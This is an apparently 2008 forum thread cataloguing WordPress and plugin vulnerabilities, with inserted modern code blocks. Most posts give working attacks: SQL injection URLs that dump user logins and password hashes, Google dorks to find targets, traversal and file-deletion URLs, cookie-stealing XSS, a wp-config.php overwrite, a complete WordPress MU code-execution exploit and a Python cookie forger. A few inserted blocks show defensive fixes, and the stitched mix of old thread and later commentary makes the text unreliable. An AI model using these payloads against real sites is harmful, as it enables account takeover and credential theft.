/wp-admin/link-manager.php?page=\..\..\.htaccess
/wp-admin/link-add.php?page=\..\..\.htaccess
/wp-admin/link-categories.php?page=\..\..\.htaccess
/wp-admin/link-import.php?page=\..\..\.htaccess
/wp-admin/theme-editor.php?page=\..\..\.htaccess
/wp-admin/plugin-editor.php?page=\..\..\.htaccess
/wp-admin/profile.php?page=\..\..\.htaccess
/wp-admin/users.php?page=\..\..\.htaccess
/wp-admin/options-general.php?page=\..\..\.htaccess
/wp-admin/options-writing.php?page=\..\..\.htaccess
/wp-admin/options-reading.php?page=\..\..\.htaccess
/wp-admin/options-discussion.php?page=\..\..\.htaccess
/wp-admin/options-permalink.php?page=\..\..\.htaccess
/wp-admin/options-misc.php?page=\..\..\.htaccess
/wp-admin/import.php?page=\..\..\.htaccess
/wp-admin/admin.php?page=\..\..\.htaccess
/wp-admin/bookmarklet.php?page=\..\..\.htaccess
/wp-admin/cat-js.php?page=\..\..\.htaccess
/wp-admin/inline-uploading.php?page=\..\..\.htaccess
/wp-admin/options.php?page=\..\..\.htaccess
/wp-admin/profile-update.php?page=\..\..\.htaccess
/wp-admin/sidebar.php?page=\..\..\.htaccess
/wp-admin/user-edit.php?page=\..\..\.htaccess

Windows only

halkfild 14.01.2008 02:24

WordPress <=2.3.1 Cookies Manipulation - logging in with the md5() password hash in the cookies
 
Logging in with the md5() password hash in the cookies

Software: WordPress 2.3.1 and earlier versions
Severity: Low
Exploit available: No
Description:
The vulnerability allows a remote user to bypass certain security restrictions.

The vulnerability exists because an attacker can construct the two authentication cookies ("wordpressuser_*" and "wordpresspass_*") from data in the "users" table and gain administrative access to the application. Successful exploitation requires read access to the "users" table in the database.

description and site
http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt

==================================

PHP code:

$siteurl;$host;
'wordpressuser_'.md5($siteurl).'='.$login
'wordpresspass_'.md5($siteurl).'='.md5(md5($pass)) 

Here $siteurl is a value stored in the DB:
wp_options
-siteurl

So during an SQL injection it is worth pulling it out as well: (select siteurl from wp_options)

Sometimes one WordPress install is used for several domain names.
In that case $host is used instead of $siteurl; it is effectively the URL path to the blog, for example:
http://wordpress.com/blog
without a trailing slash.



NEW! Addendum.

COOKIEHASH disclosure.

There is no need to obtain siteurl, md5 it and check the result at all.

It is enough to send a POST request to wp-pass.php or to wp-login.php.
The response returns a valid COOKIEHASH for the cookie.

[-1-] /wp-login.php?action=logout

[-2-] wp-pass.php

Code:

POST /wordpress/wp-pass.php HTTP/1.0
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

post_password=test

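The cookie construction from the post above, worked through in code. This is an added example, not the post's or WordPress's own code: it builds the `wordpressuser_*` / `wordpresspass_*` pair from a `wp_users` row (login plus the stored `md5(password)`), renders them as a `Cookie:` header, and pulls COOKIEHASH out of a `Set-Cookie` line of the kind the `wp-pass.php` request returns. The blog URL, the `wp-postpass_` cookie name used in the sample header, and the sample hash (md5 of the word "password") are constructed assumptions; the cookie names and the md5(md5()) layout come from the post.

```python
import hashlib
import re
from typing import Dict, Iterable, Optional


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def cookiehash(siteurl: str) -> str:
    """COOKIEHASH as the post describes it: md5 of siteurl (or $host), no trailing slash."""
    return md5hex(siteurl.rstrip("/"))


def forge_auth_cookies(siteurl: str, user_login: str, user_pass_md5: str) -> Dict[str, str]:
    """Build the pre-2.5 WordPress auth cookie pair from a wp_users row.

    user_pass_md5 is the value stored in wp_users.user_pass (md5 of the plaintext).
    The cookie carries md5 of that stored hash, i.e. md5(md5(password)), so the
    plaintext password is never needed: a readable users table is enough."""
    h = cookiehash(siteurl)
    return {
        "wordpressuser_" + h: user_login,
        "wordpresspass_" + h: md5hex(user_pass_md5),
    }


def cookie_header(cookies: Dict[str, str]) -> str:
    """Render the pair as the value of a single Cookie: request header."""
    return "; ".join(f"{name}={value}" for name, value in cookies.items())


# Any cookie whose name ends in "_" plus 32 hex digits carries COOKIEHASH.
_COOKIEHASH_RE = re.compile(r"[A-Za-z_-]+_([0-9a-f]{32})=")


def extract_cookiehash(set_cookie_headers: Iterable[str]) -> Optional[str]:
    """Return COOKIEHASH from the first Set-Cookie header that carries one, else None."""
    for header in set_cookie_headers:
        m = _COOKIEHASH_RE.search(header)
        if m:
            return m.group(1)
    return None


if __name__ == "__main__":
    # Constructed values: a fictitious blog and the md5 of "password"
    # (5f4dcc3b5aa765d61d8327deb882cf99) as it would sit in wp_users.user_pass.
    forged = forge_auth_cookies("http://blog.example/", "admin",
                                "5f4dcc3b5aa765d61d8327deb882cf99")
    print("Cookie:", cookie_header(forged))
    # Constructed Set-Cookie line in the shape wp-pass.php emits; the cookie
    # name "wp-postpass_" is an assumption, only the hash suffix matters here.
    sample = "wp-postpass_" + cookiehash("http://blog.example") + "=x; path=/"
    print("COOKIEHASH:", extract_cookiehash([sample]))
```

Because the cookie value is a deterministic function of the stored hash, any SQL injection that reads `wp_users` (several are listed earlier in this thread) turns directly into an admin session without cracking anything; a salted, per-session token is what closes that, which is what later versions moved to.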

ettee 16.01.2008 01:04

File locations
Code:

blogscout
lectblog
blogs
blog
blog-*
blog*
myblog
bloggt
blo
*-blog
wp
wordpress
wordpress.1
wordpress-1
wordpress_1
wordpress-*
wordpress_*
weblog
webblog
webblogs
web-blog
my-journals
myjournal
my-favorite-blog
myblogs
my-blogs
wp1-5
wp2.2
wp2-2
wp2.3
wp2-3
wp2.0
powered-by-wordpress
wordpress-mu
wordpress_1_5
wordpress-1.5
wordpress-1-5-1
wordpress-1.5.2       
wordpress-1.0.2
wordpress-1-2-2
wordpress_2.0_only
wordpress_2.3-series
wordpress_2.3.2
wordpress_2-3-1
Wordpress_2.4
Wordpress_2.5
Wordpress_2-5
wordpress_2.3.1
wordpress_2.0.2
wordpress_2.3
wordpress_2.0.7
wordpress_2.2.3
wordpress_2.1.2
WordPress_2.4
WordPress_2-3
WordPress_2-2-2       
WordPress_2-3-3
wordpress_2-3
Wordpress_2-2


+toxa+ 17.01.2008 17:23

Democracy 2.0.1 HTML Injection Vulnerability
 
Code:

http://wordpress.dom/blah'style=xss:expression(alert(document.cookie)); (Tested on IE7)
OR
http://wordpress.dom/blah'onMouseOver=javascript:alert(document.cookie);// (Tested on Firefox & IE)

fix
PHP code:

Vulnerable code in class.php (Line 166):
$url = htmlspecialchars(add_query_arg(array('dem_action' => 'view', 'dem_poll_id' => $this->id)));

Change to:
$url = htmlspecialchars(add_query_arg(array('dem_action' => 'view', 'dem_poll_id' => $this->id)), ENT_QUOTES);


+toxa+ 17.01.2008 17:24

WP TextLinkAds Plugin SQL Injection Vulnerability
 
Code:

http://wordpress-blog/?textlinkads_action=sync_posts&textlinkads_post_id='/**/U/**/S/**/1,user_login,user_pass,display_name/**/from/**/wp_users%23
fix
PHP code:

The vulnerable code is found on line 512:
$postId = $postId;
This variable is passed to $wpdb->get_results without being sanitised.
To fix this hole simply change the above line to:
$postId = (int) $postId;


iddqd 19.01.2008 03:20

WordPress<=2.0.3 Arbitrary file deletion

Windows only:

HTML code:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

This can also be used for a DoS attack: once index.php is deleted the site stops working.

WordPress<=2.0.3 DoS:


HTML code:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
Windows only:
HTML code:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

XSS:

HTML code:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E


XSS: wp-cat2tag converter:
HTML code:

http://localhost/wp/wp-admin/admin.php?import=wp-cat2tag&--><script>alert(/XSS/)</script>
Vulnerable: WordPress <= 2.0.11 and potentially later versions (2.1.x, 2.2.x and 2.3.x).
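The three traversal bugs in this thread (PictPress `resize.php` with a NUL-terminated `path`, the `validate_file()` check that `\..\` slips past on Windows, and the `wp-db-backup.php` `backup` parameter) all come down to joining attacker-controlled path pieces under a base directory. This is an added example, not code from any of those posts or from WordPress: `flawed_validate_file` is a simplified emulation of the `'./'` substring check quoted above, and `safe_join` is the resolve-then-compare replacement, which rejects NUL bytes, treats backslash as a separator regardless of host OS, and refuses any result outside the base directory. The directory names in the sample calls are assumptions.

```python
import os
from typing import Optional


def flawed_validate_file(file: str) -> bool:
    """Simplified emulation of the check quoted for WP 2.0.11: the name is rejected
    only if it contains './'. Returns True when the name is (wrongly) accepted, so
    '\\..\\..\\.htaccess' passes because it never contains that substring."""
    return "./" not in file


def safe_join(base_dir: str, *parts: str) -> Optional[str]:
    """Resolve user-controlled path pieces under base_dir.

    Returns the absolute path, or None when any piece carries a NUL byte (PHP
    would truncate the string there, as in the PictPress PoC) or when the
    normalised result lies outside base_dir (../ or \\..\\ traversal)."""
    base = os.path.normpath(os.path.abspath(base_dir))
    cleaned = []
    for part in parts:
        if "\x00" in part:
            return None
        # Treat backslash as a separator on every OS, so the Windows-only \..\
        # trick is judged exactly like ../ on Unix.
        part = part.replace("\\", "/")
        # An absolute piece would make os.path.join discard base_dir entirely.
        cleaned.append(part.lstrip("/"))
    candidate = os.path.normpath(os.path.join(base, *cleaned))
    # normpath has already collapsed every '..'; what is left must still start
    # with base as a whole path component, not merely as a string prefix.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    print(flawed_validate_file("\\..\\..\\.htaccess"))   # True: accepted by the old check
    print(flawed_validate_file("../../.htaccess"))       # False
    cache = "/var/www/wp-content/cache"                  # assumed PictPress cache dir
    print(safe_join(cache, "../../../../../../../../../../", "/etc/passwd\x00"))  # None (NUL)
    print(safe_join(cache, "../../../../../../../../../../", "/etc/passwd"))      # None (escapes base)
    print(safe_join("/var/www/wp-admin", "\\..\\..\\.htaccess"))                  # None (escapes base)
    print(safe_join(cache, "thumb", "pic.jpg"))          # /var/www/wp-content/cache/thumb/pic.jpg
```

Substring blacklists (`'..'`, `'./'`, `'../'`) keep failing on encoding and separator variants; comparing the normalised result against the base directory does not depend on how the traversal was spelled.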

Solide Snake 20.01.2008 14:38

Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability
 

Код:

            remote sql injection exploit
###############################################################
                 

# >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4.

# >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_users where id=1/*     

(wp_tbv_users)

# >>> google: Fredrik Fahlstad. Version: 1.7.4.

# >>> author  websec Team  ./members =====>  Virus_C, Refresh , Virusa

# >>> page : hacking.ge

###############################################################

this is example

http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*

# milw0rm.com [2008-01-19]


_-Ramos-_ 22.01.2008 14:03

XSS in the wp-slimstat 0.92 plugin for WordPress

PoC, direct:
Code:

http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=[xss]

PoC in Perl:
Code:

# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#
 
#use Net::DNS:Simple;
#use Math;
use Socket;
 
print "Welcome. What is target email address of wordpress blog admin : \n";
my $target = <STDIN>;
chomp($target);
print "ok target is $target\n";
sleep(3);
print "ok What is address of wordpress blog : \n";
sleep(5); my $address = <STDIN>;
chomp($address);
print "ok address is $address\n";
sleep(6);
# print "testing"
print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n";
print "\n\n — CUT OUTPUT HERE — \n\n";
print "HELO xssworm.com\n";
print "RSET\n";
print "MAIL FROM: <xssworm\@hotmail.com>\n";
print "RCPT TO: <$target>\n";
print "DATA\n"; print "Free x pciture and movies at $address\n";
print "\r\n.\r\nquit\r\n";
print "\n\n — END OF OUTPUT CUT HERE –\n";
print "";
print "Ok now you neeed to cut the exploit above and paste it to:\n";
print "$address : 25 \n";
print "Shellcode by vaj\@xssworm.com c. 2007\n";
print "End of attack.\n";
print "";
#print "Debug mode on"
#print "XSS initialized"
#payload
sleep(1); exit(0);
# snips


ettee 23.01.2008 17:45

Full path disclosure:
Code:

/wp-admin/theme-editor.php?page=
/wp-admin/plugins.php?page=
/wp-admin/plugin-editor.php?page=
/wp-admin/profile.php?page=
/wp-admin/users.php?page=
/wp-admin/options-general.php?page=
/wp-admin/cat-js.php?page=
/wp-admin/inline-uploading.php?page=
/wp-admin/options.php?page=
/wp-admin/profile-update.php?page=
/wp-admin/sidebar.php?page=
/wp-admin/user-edit.php?page=
/wp-admin/admin.php?page=
/wp-admin/admin-footer.php
/wp-admin/admin-functions.php
/wp-admin/edit-form.php
/wp-admin/edit-form-advanced.php
/wp-admin/edit-form-comment.php
/wp-admin/edit-link-form.php
/wp-admin/index.php?page=
/wp-admin/link-manager.php?page=
/wp-admin/link-add.php?page=
/wp-admin/link-categories.php?page=
/wp-admin/link-import.php?page=
/wp-admin/edit-page-form.php
/wp-admin/menu.php
/wp-admin/menu-header.php
/wp-admin/import/blogger.php
/wp-admin/import/dotclear.php
/wp-admin/import/greymatter.php
/wp-admin/import/livejournal.php
/wp-admin/options-writing.php?page=
/wp-admin/options-reading.php?page=
/wp-admin/options-discussion.php?page=
/wp-admin/options-permalink.php?page=
/wp-admin/options-misc.php?page=
/wp-admin/import.php?page=
/wp-admin/import/mt.php
/wp-admin/import/rss.php
/wp-admin/import/textpattern.php
/wp-admin/bookmarklet.php?page=


Elekt 24.01.2008 06:35


=====================

Changes between versions, for general reference:

_http://trac.wordpress.org/changeset?old_path=tags%2F2.3.1&old=6528&new_path=tags%2F2.3.2&new=6528

_http://trac.wordpress.org/query?component=Security&milestone=2.3.2&order=priority

=====================

Description: login/password brute force that bypasses logging.

It is possible to determine the login name and brute-force the password via cookies (wp-login.php) and basic auth (wp-app.php).

PHP code:

function wp_login()

__('<strong>ERROR</strong>: Invalid username.');
__('<strong>ERROR</strong>: Incorrect password.'); 

========================

Description: COOKIEHASH disclosure.

Sometimes there are problems building the cookies for the exploit.
Usually this happens when the blog runs on several domains/subdomains at once.
The "siteurl" pulled from the database does not fit.
The response header returns us an empty cookie with the prefix.

/wp-login.php?action=logout

/wp-pass.php

=====================

Description: admin rights: writing to wp-config.php

No file name check on write.

Reading wp-config.php is not allowed, but the check was forgotten on write.

You can specify your own remote server and administer the blog through your own DB.


Cannot read:
/wp-admin/templates.php?file=wp-config.php

But can write:
/wp-admin/templates.php
POST: newcontent=<?php;phpinfo();?>&action=update&file=wp-config.php

=====================

Description: passive XSS via $_POST['pages-sortby']

Rights: admin

Examples of vulnerable code:

/wp-admin/widgets.php

PHP code:

function wp_widget_pages_control() {

        $sortby = stripslashes( $_POST['pages-sortby'] );

                    <option value="post_title"<?php selected( $options['sortby'], 'post_title' ); ?>><?php _e('Page title'); ?></option>
                    <option value="menu_order"<?php selected( $options['sortby'], 'menu_order' ); ?>><?php _e('Page order'); ?></option>
                    <option value="ID"<?php selected( $options['sortby'], 'ID' ); ?>><?php _e( 'Page ID' ); ?></option>

=====================

Description: the admin's mail login and password are stored in plaintext in the DB and shown in the admin panel.

/wp-admin/options-writing.php

wp_options
-mailserver_login
-mailserver_pass

=====================

Description: when importing a blog, if there are posts without an author (anonymous), a user is created with default settings.

That is, accounts with the default password "password" may exist.

Examples of vulnerable code:

/wp-admin/import/greymatter.php

PHP code:

                $user_id = username_exists($post_author);
                if (!$user_id) {    // if deleted from GM, we register the author as a level 0 user
                    $user_ip="127.0.0.1";
                    $user_domain="localhost";
                    $user_browser="server";
                    $user_joindate="1979-06-06 00:41:00";
                    $user_login=$wpdb->escape($post_author);
                    $pass1=$wpdb->escape("password");
                    $user_nickname=$wpdb->escape($post_author);
                    $user_email=$wpdb->escape("user@deleted.com");
                    $user_url=$wpdb->escape("");
                    $user_joindate=$wpdb->escape($user_joindate);

                    $user_info = array("user_login"=>$user_login, "user_pass"=>$pass1, "user_nickname"=>$user_nickname, "user_email"=>$user_email, "user_url"=>$user_url, "user_ip"=>$user_ip, "user_domain"=>$user_domain, "user_browser"=>$user_browser, "dateYMDhour"=>$user_joindate, "user_level"=>0, "user_idmode"=>"nickname");
                    $user_id = wp_insert_user($user_info);
                    $this->gmnames[$postinfo[1]] = $user_id;
                }


=====================
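
The check that the templates.php write path was missing, as an added example (my code, not WordPress's): a file name taken from the request is only accepted if it resolves to an existing file inside the editable theme directory, so a wp-config.php one or more levels up can neither be read nor written through the editor. The directory layout and file contents are constructed sample data.

```php
<?php
// Added example, not WordPress code: path containment check for a theme editor.
// Both read and write must go through resolve_editable_file(); the bug above was
// that only the read side checked the file name.

function resolve_editable_file(string $theme_dir, string $requested): ?string {
    $base = realpath($theme_dir);
    // realpath() collapses ../ and follows symlinks, and returns false when the
    // file does not exist, so a non-existent target is refused as well.
    $target = realpath($theme_dir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $target === false) {
        return null;
    }
    // Compare the *resolved* paths: the target must start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

function save_template(string $theme_dir, string $requested, string $content): bool {
    $path = resolve_editable_file($theme_dir, $requested);
    if ($path === null) {
        return false; // refuse; a real handler would also log the attempt
    }
    return file_put_contents($path, $content) !== false;
}

// Constructed layout mirroring a WordPress install: wp-config.php sits above
// the theme directory that the editor is allowed to touch.
$root  = sys_get_temp_dir() . '/wp-demo-' . bin2hex(random_bytes(4));
$theme = $root . '/wp-content/themes/default';
mkdir($theme, 0700, true);
file_put_contents($root . '/wp-config.php', "<?php // secrets\n");
file_put_contents($theme . '/style.css', "/* theme */\n");

var_dump(save_template($theme, 'style.css', "/* edited */\n"));                // bool(true)
var_dump(save_template($theme, '../../../wp-config.php', "<?php phpinfo();")); // bool(false)
var_dump(file_get_contents($root . '/wp-config.php') === "<?php // secrets\n"); // bool(true): untouched
```

The prefix test is done on the resolved paths, not on the request string, which is what makes "../" sequences, doubled separators and symlinks irrelevant; a denylist of names such as wp-config.php would not have the same guarantee.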

halkfild 28.01.2008 14:52

# Author : Houssamix From H-T Team
# Script : Wordpress Plugin fGallery 2.4.1
# Download : http://www.fahlstad.se/wp-plugins/fgallery/
# BUG : Remote SQL Injection Vulnerability
# Dork : inurl:/wp-content/plugins/fgallery/

## Vulnerable CODE :
~~~~~~~ /wp-content/plugins/fgallery/fim_rss.php ~~~~~~~~~~~~~

PHP code:

$cat = $wpdb->get_row("SELECT * FROM $cats WHERE id = $_GET[album]");
$images = $wpdb->get_results("SELECT * FROM $imgs WHERE cat = $_GET[album] AND status = 'include'");

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Exploit :
[Target.il]/[wordpress_path]//wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--

Example
Quote:

http://site.il/wordpress/wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--

src='http://site.il/wordpress/wp-content/fgallery/thumb_admin:051e3db4c8eee42d7c93df48dffe4d5f:markus@swimatyourownrisk.com' /><br>5 markus@swimatyourownrisk.com Thu, 01 Jan 1970 00:00:00 +0100

# Script : Wordpress Plugin WP-Cal
# Download : http://www.fahlstad.se/wp-plugins/wp-cal/
# BUG : Remote SQL Injection Vulnerability
# Dorks : inurl:/wp-content/plugins/wp-cal/
inurl:/WP-Cal/

## Vulnerable CODE :
~~~~~~~ /wp-content/plugins/wp-cal/functions/editevent.php ~~~~~~~~~~~~~
PHP code:

$id = $_GET['id'];

$event = $wpdb->get_row("SELECT * FROM $table WHERE id = $id");

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Exploit :
/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--

example :
Quote:

http://site.il/wordpress/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
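
The pattern that closes the fGallery and WP-Cal holes above, and the TextLinkAds "(int) $postId" fix earlier in the thread, as one added example (my code, not the plugins' or WordPress's): validate the request parameter as an integer first, then bind it in a prepared statement instead of interpolating it into the SQL string. It assumes the pdo_sqlite extension; the table and its rows are constructed sample data standing in for the plugin's album table.

```php
<?php
// Added example, not plugin or WordPress code: two layers against
// "SELECT ... WHERE id = $_GET[album]". Layer 1 rejects anything that is not a
// plain integer, so the injection string never reaches query construction.
// Layer 2 binds the value as a parameter, so even a value that slipped through
// is sent as data, never as SQL.

function read_id_param(array $query, string $name): ?int {
    // FILTER_VALIDATE_INT accepts only a decimal integer (here: >= 1) and
    // returns false for everything else.
    $id = filter_var($query[$name] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetch_album(PDO $db, int $id): ?array {
    // The statement text is fixed; the id travels separately as a bound value.
    // The WordPress-native equivalent is $wpdb->prepare("... WHERE id = %d", $id).
    $stmt = $db->prepare('SELECT id, name FROM cats WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cats (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO cats (id, name) VALUES (1, 'holiday'), (2, 'family')");

// A normal request
$id = read_id_param(['album' => '2'], 'album');
print_r(fetch_album($db, $id)); // Array ( [id] => 2 [name] => family )

// The payload shape from the PoCs above: refused before any SQL is built,
// which is the point at which the handler should answer 400 or 404.
$payload = '-1 union select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7 from wp_users--';
var_dump(read_id_param(['album' => $payload], 'album')); // NULL

// A bare cast is injection-safe too (the TextLinkAds fix), but it cannot tell
// junk from a real id: it silently yields the leading number.
var_dump((int) $payload); // int(-1)
```

Either layer alone stops the UNION payloads listed in this thread; keeping both means a later edit that drops the cast (or switches the column to a string) does not silently reopen the hole.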

Solide Snake 31.01.2008 11:49

Wordpress Plugin wp-adserve (adclick.php) SQL Injection

SQL Injection:

Code:

http://www.site.com/wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users
To search, enter:

Code:

allinurl: "wp-adserve"

Wordpress Plugin WassUp 1.4.1 Remote SQL Injection

SQL Injection:

Code:

http://www.site.com/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%200,1,2,concat(0x7c,user_login,0x7c,user_pass,0x7c),3,4,0x7c,6,0x7c,8,9,10%20%20from%20wp_users
To search, enter:

Code:

allinurl: "plugins/wassup"
(c)

iddqd 02.02.2008 23:35

Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities

PoC:

http://milw0rm.com/exploits/5035

Wordpress Plugin Wordspew Remote SQL Injection Vulnerability

PoC:

http://milw0rm.com/exploits/5039

iddqd 04.02.2008 00:11

Wordpress Plugin wp-footnotes 2.2

Multiple XSS

Code:

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priority]="><script>alert("XSS")</script>

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[style_rules]=</textarea><script>alert("XSS")</script>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=</textarea><script>alert("XSS")</script>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[post_footnotes]=</textarea><script>alert(":-(")


Solide Snake 04.02.2008 16:04

Wordpress Plugin st_newsletter Remote SQL Injection

SQL Injection

Code:

wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
To search:

Code:

allinurl :"wp-content/plugins/st_newsletter"
allinurl :"shiftthis-preview.php"

(c)

iddqd 05.02.2008 19:32

Wordpress MU < 1.3.2 active_plugins option Code Execution

Exploit:

PHP code:

<?php
/*
WordPress [MU] blog's options overwrite

Credits : Alexander Concha <alex at buayacorp dot com>
Website : http://www.buayacorp.com/
Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html

This exploit uses active_plugins option to execute arbitrary PHP
*/
include_once './class-snoopy.php';

// Fix Snoopy
class SnoopyExt extends Snoopy {
    function _prepare_post_body($formvars, $formfiles) {
        if ( is_string($formvars) ) {
            return $formvars;
        }
        return parent::_prepare_post_body($formvars, $formfiles);
    }
}

set_time_limit(0);

// Any user with 'manage_options' and 'upload_files' capabilities
$user = 'user';
$pass = '1234';
$blog_url = 'http://localhost.localdomain/mu/';
$remote_file = ''; // relative path to wp-content
$local_file = '';  // the contents of this file, if any, will be uploaded

$snoopy = new SnoopyExt();

$snoopy->maxredirs = 0;
$snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check';
$snoopy->submit("{$blog_url}wp-login.php", array('log' => $user, 'pwd' => $pass));

$snoopy->setcookies(); // Set auth cookies for future requests

if ( empty($remote_file) ) {
    // Upload a new file
    $snoopy->_submit_type = 'image/gif';
    $snoopy->submit("{$blog_url}wp-app.php?action=/attachments", get_contents());

    if ( preg_match('#<id>([^<]+)</id>#i', $snoopy->results, $match) ) {
        $remote_file = basename($match[1]);
    }
}
if ( empty($remote_file) ) die('Exploit failed...');

// Look for real path
$snoopy->fetch("{$blog_url}wp-admin/export.php?download");

if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy->results, $match) ) {
    $remote_file = preg_replace('#.*?wp-content#', '', $match[1]);
}
if ( empty($remote_file) ) die('Exploit failed...');

// It assumes that file uploads are stored within wp-content
$remote_file = '../' . ltrim($remote_file, '/');

$snoopy->fetch("{$blog_url}wp-admin/plugins.php");

// Recover previous active plugins
$active_plugins = array();
if ( preg_match_all('#action=deactivate&([^\']+)#', $snoopy->results, $matches) ) {
    foreach ($matches[0] as $plugin) {
        if ( preg_match('#plugin=([^&]+)#', $plugin, $match) )
            $active_plugins[] = urldecode($match[1]);
    }
    print_r($active_plugins);
}
$active_plugins[] = $remote_file;

// Fetch a valid nonce
$snoopy->fetch("{$blog_url}wp-admin/options-general.php");

if ( preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#', $snoopy->results, $match) ) {

    // Finally update active_plugins
    $snoopy->set_submit_normal();
    $snoopy->submit("{$blog_url}wp-admin/options.php",
        array(
            'active_plugins' => $active_plugins,
            '_wpnonce' => $match[1],
            'action' => 'update',
            'page_options' => 'active_plugins',
        ));
}

function get_contents() {
    global $local_file;

    return file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>';
}
?>

# milw0rm.com [2008-02-05]


FraiDex 15.02.2008 22:14

Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability

example

Code:

http://xxxxx/forums?forum=xxxx&topic= (exploit)

EXPLOIT 1 :

Code:

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

EXPLOIT 2 :

Code:

SOMETIMES YOU CAN'T SEE (xxxx&topic), SO USE THIS EXPLOIT AFTER forum=xxx(number)

example

Code:

www.xxxxx/forums?forum=1(exploit)
&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability

example :

Code:

http://www.xxx.com/sf-forum?forum=[exploit]
EXPLOIT 1 :

Code:

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
EXPLOIT 2 :

Code:

-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*
(c) milw0rm.com

gibson 17.02.2008 03:26

Wordpress Photo album Remote SQL Injection Vulnerability

EXAMPLE
Quote:

http://xxxxxxxx/?page_id=13&album= [exploit]
Exploit
Quote:

